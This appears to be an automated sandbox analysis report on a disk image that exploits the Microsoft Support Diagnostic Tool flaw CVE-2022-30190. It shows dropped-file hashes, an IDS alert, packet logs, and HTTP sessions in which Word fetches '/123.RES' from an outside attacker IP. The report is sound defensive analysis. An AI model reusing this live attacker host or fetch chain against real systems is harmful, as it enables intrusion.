                                                                                                                                                                    MD5:E877AD0545EB0ABA64ED80B576BB67F6
                                                                                                                                                                    SHA1:4D200348AD4CA28B5EFED544D38F4EC35BFB1204
                                                                                                                                                                    SHA-256:8CAC8E1DA28E288BF9DB07B2A5BDE294122C8D2A95EA460C757AE5BAA2A05F27
                                                                                                                                                                    SHA-512:6055EC9A2306D9AA2F522495F736FBF4C3EB4078AD1F56A6224FF42EF525C54FF645337D2525C27F3192332FF56DDD5657C1384846678B343B2BFA68BD478A70
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:..#. .L.o.c.a.l.i.z.e.d...0.4./.1.1./.2.0.1.8. .0.2.:.0.5. .P.M. .(.G.M.T.)...3.0.3.:.4...8.0...0.4.1.1. ...C.L._.L.o.c.a.l.i.z.a.t.i.o.n.D.a.t.a...p.s.d.1.....#. .L.o.c.a.l.i.z.e.d...0.1./.0.4./.2.0.1.3. .1.1.:.3.2. .A.M. .(.G.M.T.)...3.0.3.:.4...8.0...0.4.1.1. ...C.L._.L.o.c.a.l.i.z.a.t.i.o.n.D.a.t.a...p.s.d.1.....C.o.n.v.e.r.t.F.r.o.m.-.S.t.r.i.n.g.D.a.t.a. .@.'.....#.#.#.P.S.L.O.C.....P.r.o.g.r.a.m._.C.h.o.i.c.e._.N.O.T.L.I.S.T.E.D.=.N.o.t. .L.i.s.t.e.d.....V.e.r.s.i.o.n._.C.h.o.i.c.e._.D.E.F.A.U.L.T.=.N.o.n.e.....V.e.r.s.i.o.n._.C.h.o.i.c.e._.W.I.N.8.R.T.M.=.W.i.n.d.o.w.s. .8.....V.e.r.s.i.o.n._.C.h.o.i.c.e._.W.I.N.7.R.T.M.=.W.i.n.d.o.w.s. .7.....V.e.r.s.i.o.n._.C.h.o.i.c.e._.W.I.N.V.I.S.T.A.2.=.W.i.n.d.o.w.s. .V.i.s.t.a. .(.S.e.r.v.i.c.e. .P.a.c.k. .2.).....V.e.r.s.i.o.n._.C.h.o.i.c.e._.W.I.N.X.P.S.P.3.=.W.i.n.d.o.w.s. .X.P. .(.S.e.r.v.i.c.e. .P.a.c.k. .3.).....V.e.r.s.i.o.n._.C.h.o.i.c.e._.M.S.I.A.U.T.O.=.S.k.i.p. .V.e.r.s.i.o.n. .C.h.e.c.k.....V.e.r.s.i.o.n._.C.h.o.i.c.e._.U.N.

                                                                                                                                                                    C:\Windows\Temp\SDIAG_70a82460-46c3-4d6a-beee-fc124429976a\en-US\DiagPackage.dll.mui

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\SysWOW64\msdt.exe
                                                                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):10752
                                                                                                                                                                    Entropy (8bit):3.517898352371806
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:96:Gmw56QoV8m7t/C7eGu7tCuKFtrHQcoC1dIO4Pktmg5CuxbEWgdv0WwF:WAQovu548tmirAWu8Wm
                                                                                                                                                                    MD5:CC3C335D4BBA3D39E46A555473DBF0B8
                                                                                                                                                                    SHA1:92ADCDF1210D0115DB93D6385CFD109301DEAA96
                                                                                                                                                                    SHA-256:330A1D9ADF3C0D651BDD4C0B272BF2C7F33A5AF012DEEE8D389855D557C4D5FD
                                                                                                                                                                    SHA-512:49CBF166122D13EEEA2BF2E5F557AA8696B859AEA7F79162463982BBF43499D98821C3C2664807EDED0A250D9176955FB5B1B39A79CDF9C793431020B682ED12
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........<...R...R...R.......R...P...R.Rich..R.................PE..L..................!.........(...............................................P...........@.......................................... ...$..............................8............................................................................rdata..............................@..@.rsrc....0... ...&..................@..@......E.........T...8...8.........E.........$...................8....rdata..8...x....rdata$zzzdbg.... .......rsrc$01.....#..0!...rsrc$02.... .......OV....,.+.(,..vA..@..E.........................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Windows\Temp\SDIAG_70a82460-46c3-4d6a-beee-fc124429976a\result\results.xsl

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\SysWOW64\msdt.exe
                                                                                                                                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):48956
                                                                                                                                                                    Entropy (8bit):5.103589775370961
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:768:hUeTHmb0+tk+Ci10ycNV6OW9a+KDoVxrVF+bBH0t9mYNJ7u2+d:hUcHXDY10tNV6OW9abDoVxrVF+bBH0tO
                                                                                                                                                                    MD5:310E1DA2344BA6CA96666FB639840EA9
                                                                                                                                                                    SHA1:E8694EDF9EE68782AA1DE05470B884CC1A0E1DED
                                                                                                                                                                    SHA-256:67401342192BABC27E62D4C1E0940409CC3F2BD28F77399E71D245EAE8D3F63C
                                                                                                                                                                    SHA-512:62AB361FFEA1F0B6FF1CC76C74B8E20C2499D72F3EB0C010D47DBA7E6D723F9948DBA3397EA26241A1A995CFFCE2A68CD0AAA1BB8D917DD8F4C8F3729FA6D244
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:<?xml version="1.0"?>..<?Copyright (c) Microsoft Corporation. All rights reserved.?>..<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:ms="urn:microsoft-performance" exclude-result-prefixes="msxsl" version="1.0">...<xsl:output method="html" indent="yes" standalone="yes" encoding="UTF-16"/>...<xsl:template name="localization">....<_locDefinition>.....<_locDefault _loc="locNone"/>.....<_locTag _loc="locData">String</_locTag>.....<_locTag _loc="locData">Font</_locTag>.....<_locTag _loc="locData">Mirror</_locTag>....</_locDefinition>...</xsl:template>... ********** Images ********** -->...<xsl:variable name="images">....<Image id="check">res://sdiageng.dll/check.png</Image>....<Image id="error">res://sdiageng.dll/error.png</Image>....<Image id="info">res://sdiageng.dll/info.png</Image>....<Image id="warning">res://sdiageng.dll/warning.png</Image>....<Image id="expand">res://sdiageng.dll/expand.png</Image>....<Image id="

                                                                                                                                                                    Static File Info

                                                                                                                                                                    General

                                                                                                                                                                    File type:data
                                                                                                                                                                    Entropy (8bit):4.388873348178114
                                                                                                                                                                    TrID:
                                                                                                                                                                    • null bytes (2050048/1) 99.34%
                                                                                                                                                                    • Photoshop Action (5010/6) 0.24%
                                                                                                                                                                    • Lotus 123 Worksheet (generic) (2007/4) 0.10%
                                                                                                                                                                    • HSC music composer song (1267/141) 0.06%
                                                                                                                                                                    • Game Music Creator Music (1131/43) 0.05%
                                                                                                                                                                    File name:68101181_048154.img
                                                                                                                                                                    File size:2686976
                                                                                                                                                                    MD5:a623c3499f992a05c4ee5b9b2d3858f8
                                                                                                                                                                    SHA1:ade8126beb9690929fd253686534b77a97ab4c44
                                                                                                                                                                    SHA256:c77c63b0ad713ca97776305af4b22cd934271fec00f3c8029bdbbfcf8cd1ed98
                                                                                                                                                                    SHA512:27dabe09827c8b81f1dc00063a57ffcb277eabe060299994f1bd5340d0a1b3d8f348dc53458b53bee44232958f3f1ec370a0ed126b2c7266b838f9a51b150ac2
                                                                                                                                                                    SSDEEP:24576:380Ra7rJwVXWqZLSPZF5BQjaM+R4YENZrfrzfQND6CJ0:3t8kRKZ29+I4NDLJ
                                                                                                                                                                    TLSH:4CC55C21B2CEC737D4F3277C8D6FB658946A7D111E38945A7BE40E4C0E3A6813A2D693
                                                                                                                                                                    File Content Preview:...............................................................................................................................................................................................................................................................

                                                                                                                                                                    Network Behavior

                                                                                                                                                                    Snort IDS Alerts

                                                                                                                                                                    TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                                                    185.234.247.119192.168.2.480497622036726 06/07/22-19:21:17.785538TCP2036726ET EXPLOIT Possible Microsoft Support Diagnostic Tool Exploitation Inbound (CVE-2022-30190)8049762185.234.247.119192.168.2.4

                                                                                                                                                                    Network Port Distribution

                                                                                                                                                                    TCP Packets

                                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                    Jun 7, 2022 19:21:14.022562027 CEST4976180192.168.2.4185.234.247.119
                                                                                                                                                                    Jun 7, 2022 19:21:14.050025940 CEST8049761185.234.247.119192.168.2.4
                                                                                                                                                                    Jun 7, 2022 19:21:14.050148010 CEST4976180192.168.2.4185.234.247.119
                                                                                                                                                                    Jun 7, 2022 19:21:14.123152971 CEST4976180192.168.2.4185.234.247.119
                                                                                                                                                                    Jun 7, 2022 19:21:14.150544882 CEST8049761185.234.247.119192.168.2.4
                                                                                                                                                                    Jun 7, 2022 19:21:14.150614023 CEST8049761185.234.247.119192.168.2.4
                                                                                                                                                                    Jun 7, 2022 19:21:14.354796886 CEST4976180192.168.2.4185.234.247.119
                                                                                                                                                                    Jun 7, 2022 19:21:14.453907967 CEST4976180192.168.2.4185.234.247.119
                                                                                                                                                                    Jun 7, 2022 19:21:14.481559992 CEST8049761185.234.247.119192.168.2.4
                                                                                                                                                                    Jun 7, 2022 19:21:14.542310953 CEST4976180192.168.2.4185.234.247.119
                                                                                                                                                                    Jun 7, 2022 19:21:17.600215912 CEST4976180192.168.2.4185.234.247.119
                                                                                                                                                                    Jun 7, 2022 19:21:17.628205061 CEST8049761185.234.247.119192.168.2.4
                                                                                                                                                                    Jun 7, 2022 19:21:17.725593090 CEST4976280192.168.2.4185.234.247.119
                                                                                                                                                                    Jun 7, 2022 19:21:17.753061056 CEST8049762185.234.247.119192.168.2.4
                                                                                                                                                                    Jun 7, 2022 19:21:17.753199100 CEST4976280192.168.2.4185.234.247.119
                                                                                                                                                                    Jun 7, 2022 19:21:17.757827997 CEST4976280192.168.2.4185.234.247.119
                                                                                                                                                                    Jun 7, 2022 19:21:17.785219908 CEST8049762185.234.247.119192.168.2.4
                                                                                                                                                                    Jun 7, 2022 19:21:17.785537958 CEST8049762185.234.247.119192.168.2.4
                                                                                                                                                                    Jun 7, 2022 19:21:17.785557032 CEST8049762185.234.247.119192.168.2.4
                                                                                                                                                                    Jun 7, 2022 19:21:17.785573006 CEST8049762185.234.247.119192.168.2.4
                                                                                                                                                                    Jun 7, 2022 19:21:17.785618067 CEST8049762185.234.247.119192.168.2.4
                                                                                                                                                                    Jun 7, 2022 19:21:17.785648108 CEST4976280192.168.2.4185.234.247.119
                                                                                                                                                                    Jun 7, 2022 19:21:17.785665035 CEST4976280192.168.2.4185.234.247.119
                                                                                                                                                                    Jun 7, 2022 19:21:17.785717964 CEST4976280192.168.2.4185.234.247.119
                                                                                                                                                                    Jun 7, 2022 19:21:17.785778046 CEST8049762185.234.247.119192.168.2.4
                                                                                                                                                                    Jun 7, 2022 19:21:17.785834074 CEST4976280192.168.2.4185.234.247.119
                                                                                                                                                                    Jun 7, 2022 19:21:17.855159044 CEST4976180192.168.2.4185.234.247.119
                                                                                                                                                                    Jun 7, 2022 19:21:18.104799032 CEST4976280192.168.2.4185.234.247.119
                                                                                                                                                                    Jun 7, 2022 19:21:18.132652044 CEST8049762185.234.247.119192.168.2.4
                                                                                                                                                                    Jun 7, 2022 19:21:18.132742882 CEST4976280192.168.2.4185.234.247.119
                                                                                                                                                                    Jun 7, 2022 19:21:18.607587099 CEST4976280192.168.2.4185.234.247.119
                                                                                                                                                                    Jun 7, 2022 19:21:18.635207891 CEST8049762185.234.247.119192.168.2.4
                                                                                                                                                                    Jun 7, 2022 19:21:18.635379076 CEST4976280192.168.2.4185.234.247.119
                                                                                                                                                                    Jun 7, 2022 19:21:18.721376896 CEST4976180192.168.2.4185.234.247.119
                                                                                                                                                                    Jun 7, 2022 19:21:18.748950005 CEST8049761185.234.247.119192.168.2.4
                                                                                                                                                                    Jun 7, 2022 19:21:18.837891102 CEST4976180192.168.2.4185.234.247.119
                                                                                                                                                                    Jun 7, 2022 19:21:18.865309000 CEST8049761185.234.247.119192.168.2.4
                                                                                                                                                                    Jun 7, 2022 19:21:18.925173044 CEST4976280192.168.2.4185.234.247.119
                                                                                                                                                                    Jun 7, 2022 19:21:18.952740908 CEST8049762185.234.247.119192.168.2.4
                                                                                                                                                                    Jun 7, 2022 19:21:18.952858925 CEST4976280192.168.2.4185.234.247.119
                                                                                                                                                                    Jun 7, 2022 19:21:18.963536978 CEST4976280192.168.2.4185.234.247.119
                                                                                                                                                                    Jun 7, 2022 19:21:18.991211891 CEST8049762185.234.247.119192.168.2.4
                                                                                                                                                                    Jun 7, 2022 19:21:18.991384983 CEST4976280192.168.2.4185.234.247.119
                                                                                                                                                                    Jun 7, 2022 19:21:19.042788982 CEST4976180192.168.2.4185.234.247.119
                                                                                                                                                                    Jun 7, 2022 19:21:19.215001106 CEST4976280192.168.2.4185.234.247.119
                                                                                                                                                                    Jun 7, 2022 19:21:19.242710114 CEST8049762185.234.247.119192.168.2.4
                                                                                                                                                                    Jun 7, 2022 19:21:19.242794991 CEST4976280192.168.2.4185.234.247.119
                                                                                                                                                                    Jun 7, 2022 19:21:28.708358049 CEST4976280192.168.2.4185.234.247.119
                                                                                                                                                                    Jun 7, 2022 19:21:28.736881971 CEST8049762185.234.247.119192.168.2.4
                                                                                                                                                                    Jun 7, 2022 19:21:28.736963034 CEST4976280192.168.2.4185.234.247.119
                                                                                                                                                                    Jun 7, 2022 19:22:23.866662979 CEST8049761185.234.247.119192.168.2.4
                                                                                                                                                                    Jun 7, 2022 19:22:23.866827011 CEST4976180192.168.2.4185.234.247.119
                                                                                                                                                                    Jun 7, 2022 19:22:23.866884947 CEST4976180192.168.2.4185.234.247.119
                                                                                                                                                                    Jun 7, 2022 19:22:23.895661116 CEST8049761185.234.247.119192.168.2.4
                                                                                                                                                                    Jun 7, 2022 19:22:33.736814976 CEST8049762185.234.247.119192.168.2.4
                                                                                                                                                                    Jun 7, 2022 19:22:33.736965895 CEST4976280192.168.2.4185.234.247.119
                                                                                                                                                                    Jun 7, 2022 19:22:39.019610882 CEST4978080192.168.2.4185.234.247.119
                                                                                                                                                                    Jun 7, 2022 19:22:39.047683954 CEST8049780185.234.247.119192.168.2.4
                                                                                                                                                                    Jun 7, 2022 19:22:39.047900915 CEST4978080192.168.2.4185.234.247.119
                                                                                                                                                                    Jun 7, 2022 19:22:39.049490929 CEST4978080192.168.2.4185.234.247.119
                                                                                                                                                                    Jun 7, 2022 19:22:39.077296019 CEST8049780185.234.247.119192.168.2.4
                                                                                                                                                                    Jun 7, 2022 19:22:39.216723919 CEST8049780185.234.247.119192.168.2.4
                                                                                                                                                                    Jun 7, 2022 19:22:39.216821909 CEST8049780185.234.247.119192.168.2.4
                                                                                                                                                                    Jun 7, 2022 19:22:39.216876030 CEST8049780185.234.247.119192.168.2.4
                                                                                                                                                                    Jun 7, 2022 19:22:39.216922998 CEST8049780185.234.247.119192.168.2.4
                                                                                                                                                                    Jun 7, 2022 19:22:39.217030048 CEST4978080192.168.2.4185.234.247.119
                                                                                                                                                                    Jun 7, 2022 19:22:39.217058897 CEST8049780185.234.247.119192.168.2.4
                                                                                                                                                                    Jun 7, 2022 19:22:39.217108965 CEST4978080192.168.2.4185.234.247.119
                                                                                                                                                                    Jun 7, 2022 19:22:39.217113018 CEST8049780185.234.247.119192.168.2.4
                                                                                                                                                                    Jun 7, 2022 19:22:39.217155933 CEST8049780185.234.247.119192.168.2.4
                                                                                                                                                                    Jun 7, 2022 19:22:39.217168093 CEST4978080192.168.2.4185.234.247.119
                                                                                                                                                                    Jun 7, 2022 19:22:39.217241049 CEST8049780185.234.247.119192.168.2.4
                                                                                                                                                                    Jun 7, 2022 19:22:39.217291117 CEST8049780185.234.247.119192.168.2.4
                                                                                                                                                                    Jun 7, 2022 19:22:39.217297077 CEST4978080192.168.2.4185.234.247.119
                                                                                                                                                                    Jun 7, 2022 19:22:39.245073080 CEST8049780185.234.247.119192.168.2.4
                                                                                                                                                                    Jun 7, 2022 19:22:39.245120049 CEST8049780185.234.247.119192.168.2.4
                                                                                                                                                                    Jun 7, 2022 19:22:39.245152950 CEST8049780185.234.247.119192.168.2.4
                                                                                                                                                                    Jun 7, 2022 19:22:39.245182991 CEST8049780185.234.247.119192.168.2.4
                                                                                                                                                                    Jun 7, 2022 19:22:39.245203972 CEST4978080192.168.2.4185.234.247.119
                                                                                                                                                                    Jun 7, 2022 19:22:39.245219946 CEST4978080192.168.2.4185.234.247.119
                                                                                                                                                                    Jun 7, 2022 19:22:39.245223999 CEST8049780185.234.247.119192.168.2.4
                                                                                                                                                                    Jun 7, 2022 19:22:39.245260954 CEST8049780185.234.247.119192.168.2.4
                                                                                                                                                                    Jun 7, 2022 19:22:39.245285034 CEST4978080192.168.2.4185.234.247.119
                                                                                                                                                                    Jun 7, 2022 19:22:39.245301008 CEST8049780185.234.247.119192.168.2.4
                                                                                                                                                                    Jun 7, 2022 19:22:39.245332003 CEST8049780185.234.247.119192.168.2.4
                                                                                                                                                                    Jun 7, 2022 19:22:39.245347977 CEST4978080192.168.2.4185.234.247.119
                                                                                                                                                                    Jun 7, 2022 19:22:39.245369911 CEST8049780185.234.247.119192.168.2.4
                                                                                                                                                                    Jun 7, 2022 19:22:39.245400906 CEST8049780185.234.247.119192.168.2.4
                                                                                                                                                                    Jun 7, 2022 19:22:39.245414972 CEST4978080192.168.2.4185.234.247.119
                                                                                                                                                                    Jun 7, 2022 19:22:39.245440960 CEST8049780185.234.247.119192.168.2.4
                                                                                                                                                                    Jun 7, 2022 19:22:39.245471001 CEST8049780185.234.247.119192.168.2.4
                                                                                                                                                                    Jun 7, 2022 19:22:39.245484114 CEST4978080192.168.2.4185.234.247.119
                                                                                                                                                                    Jun 7, 2022 19:22:39.245510101 CEST8049780185.234.247.119192.168.2.4
                                                                                                                                                                    Jun 7, 2022 19:22:39.245541096 CEST8049780185.234.247.119192.168.2.4
                                                                                                                                                                    Jun 7, 2022 19:22:39.245553017 CEST4978080192.168.2.4185.234.247.119
                                                                                                                                                                    Jun 7, 2022 19:22:39.245579958 CEST8049780185.234.247.119192.168.2.4
                                                                                                                                                                    Jun 7, 2022 19:22:39.245610952 CEST8049780185.234.247.119192.168.2.4
                                                                                                                                                                    Jun 7, 2022 19:22:39.245623112 CEST4978080192.168.2.4185.234.247.119
                                                                                                                                                                    Jun 7, 2022 19:22:39.245646954 CEST8049780185.234.247.119192.168.2.4
                                                                                                                                                                    Jun 7, 2022 19:22:39.245692015 CEST4978080192.168.2.4185.234.247.119

                                                                                                                                                                    HTTP Request Dependency Graph

                                                                                                                                                                    • 185.234.247.119

                                                                                                                                                                    HTTP Packets

                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                    0192.168.2.449761185.234.247.11980C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                    Jun 7, 2022 19:21:14.123152971 CEST1219OUTOPTIONS / HTTP/1.1
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Authorization: Bearer
                                                                                                                                                                    User-Agent: Microsoft Office Word 2014
                                                                                                                                                                    X-Office-Major-Version: 16
                                                                                                                                                                    X-MS-CookieUri-Requested: t
                                                                                                                                                                    X-FeatureVersion: 1
                                                                                                                                                                    X-MSGETWEBURL: t
                                                                                                                                                                    X-IDCRL_ACCEPTED: t
                                                                                                                                                                    Host: 185.234.247.119
                                                                                                                                                                    Jun 7, 2022 19:21:14.150614023 CEST1220INHTTP/1.1 405 Not Allowed
                                                                                                                                                                    Server: nginx
                                                                                                                                                                    Date: Tue, 07 Jun 2022 17:21:14 GMT
                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                    Content-Length: 150
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                    Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>
                                                                                                                                                                    Jun 7, 2022 19:21:14.453907967 CEST1220OUTHEAD /123.RES HTTP/1.1
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Authorization: Bearer
                                                                                                                                                                    User-Agent: Microsoft Office Word 2014
                                                                                                                                                                    X-Office-Major-Version: 16
                                                                                                                                                                    X-MS-CookieUri-Requested: t
                                                                                                                                                                    X-FeatureVersion: 1
                                                                                                                                                                    X-IDCRL_ACCEPTED: t
                                                                                                                                                                    Host: 185.234.247.119
                                                                                                                                                                    Jun 7, 2022 19:21:14.481559992 CEST1220INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx
                                                                                                                                                                    Date: Tue, 07 Jun 2022 17:21:14 GMT
                                                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                                                    Content-Length: 6241
                                                                                                                                                                    Last-Modified: Fri, 03 Jun 2022 10:07:25 GMT
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    ETag: "6299dd5d-1861"
                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                    Jun 7, 2022 19:21:17.600215912 CEST1222OUTOPTIONS / HTTP/1.1
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Authorization: Bearer
                                                                                                                                                                    User-Agent: Microsoft Office Word 2014
                                                                                                                                                                    X-Office-Major-Version: 16
                                                                                                                                                                    X-MS-CookieUri-Requested: t
                                                                                                                                                                    X-FeatureVersion: 1
                                                                                                                                                                    X-MSGETWEBURL: t
                                                                                                                                                                    X-IDCRL_ACCEPTED: t
                                                                                                                                                                    Host: 185.234.247.119
                                                                                                                                                                    Jun 7, 2022 19:21:17.628205061 CEST1222INHTTP/1.1 405 Not Allowed
                                                                                                                                                                    Server: nginx
                                                                                                                                                                    Date: Tue, 07 Jun 2022 17:21:17 GMT
                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                    Content-Length: 150
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                    Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>
                                                                                                                                                                    Jun 7, 2022 19:21:18.721376896 CEST1231OUTOPTIONS / HTTP/1.1
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Authorization: Bearer
                                                                                                                                                                    User-Agent: Microsoft Office Word 2014
                                                                                                                                                                    X-Office-Major-Version: 16
                                                                                                                                                                    X-MS-CookieUri-Requested: t
                                                                                                                                                                    X-FeatureVersion: 1
                                                                                                                                                                    X-MSGETWEBURL: t
                                                                                                                                                                    X-IDCRL_ACCEPTED: t
                                                                                                                                                                    Host: 185.234.247.119
                                                                                                                                                                    Jun 7, 2022 19:21:18.748950005 CEST1231INHTTP/1.1 405 Not Allowed
                                                                                                                                                                    Server: nginx
                                                                                                                                                                    Date: Tue, 07 Jun 2022 17:21:18 GMT
                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                    Content-Length: 150
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                    Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>
                                                                                                                                                                    Jun 7, 2022 19:21:18.837891102 CEST1231OUTHEAD /123.RES HTTP/1.1
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Authorization: Bearer
                                                                                                                                                                    User-Agent: Microsoft Office Word 2014
                                                                                                                                                                    X-Office-Major-Version: 16
                                                                                                                                                                    X-MS-CookieUri-Requested: t
                                                                                                                                                                    X-FeatureVersion: 1
                                                                                                                                                                    X-IDCRL_ACCEPTED: t
                                                                                                                                                                    Host: 185.234.247.119
                                                                                                                                                                    Jun 7, 2022 19:21:18.865309000 CEST1232INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx
                                                                                                                                                                    Date: Tue, 07 Jun 2022 17:21:18 GMT
                                                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                                                    Content-Length: 6241
                                                                                                                                                                    Last-Modified: Fri, 03 Jun 2022 10:07:25 GMT
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    ETag: "6299dd5d-1861"
                                                                                                                                                                    Accept-Ranges: bytes


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                    1192.168.2.449762185.234.247.11980C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                    Jun 7, 2022 19:21:17.757827997 CEST1222OUTGET /123.RES HTTP/1.1
                                                                                                                                                                    Accept: */*
                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; ms-office; MSOffice 16)
                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                    Host: 185.234.247.119
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Jun 7, 2022 19:21:17.785537958 CEST1224INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx
                                                                                                                                                                    Date: Tue, 07 Jun 2022 17:21:17 GMT
                                                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                                                    Content-Length: 6241
                                                                                                                                                                    Last-Modified: Fri, 03 Jun 2022 10:07:25 GMT
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    ETag: "6299dd5d-1861"
                                                                                                                                                                    Accept-Ranges: bytes
